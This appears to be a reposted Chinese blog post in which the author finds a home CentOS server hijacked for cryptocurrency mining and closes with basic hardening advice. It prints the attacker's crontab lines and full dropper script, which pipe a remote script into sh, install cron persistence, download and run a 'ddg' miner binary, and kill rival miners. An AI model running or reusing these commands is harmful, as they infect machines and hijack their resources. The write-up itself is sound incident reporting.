入门客AI创业平台(我带你入门,你带我飞行)
博文笔记

发现小服务器被入侵了 cpu长期100%

创建时间:2017-11-26 投稿人: 浏览次数:906


前两天用路由开了个外网端口,把自己的一台centos6.5台式机挂上了外网。还挺有成就感的。

定时任务里有个每晚23点30自动关机的操作。昨天发现没有自动关机,没在意就手动关了。

今天本想查看一下定时任务,排查下问题。

后来发现竟然给入侵了,用来跑比特币挖矿

crontab  -l

*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh


查看了一下网址下的脚本:

源代码:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin  echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root  if [ ! -f "/tmp/ddg.2020" ]; then     curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020 fi  if [ ! -f "/tmp/ddg.2020" ]; then     wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020 fi  chmod +x /tmp/ddg.2020 && /tmp/ddg.2020   ps auxf | grep -v grep | grep Circle_MI | awk "{print $2}" | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk "{print $2}" | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk "{print $2}" | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk "{print $2}" | kill #ps auxf | grep -v grep | grep ddg.2010 | awk "{print $2}" | kill


ip 218.248.40.228 来源:


后台查询结果:ll -h /tmp/



修改建议:

密码 :越复杂越好

 ssh端口  :. 65535以下  1000以上 随意改一个端口

防火墙:必需开,提高安全等级



吓的我赶紧把服务器关闭了。。。

然后查阅大量的防止暴力破解密码,网络安全的博客,好好补补脑子





声明:该文观点仅代表作者本人,入门客AI创业平台信息发布平台仅提供信息存储空间服务,如有疑问请联系rumenke@qq.com。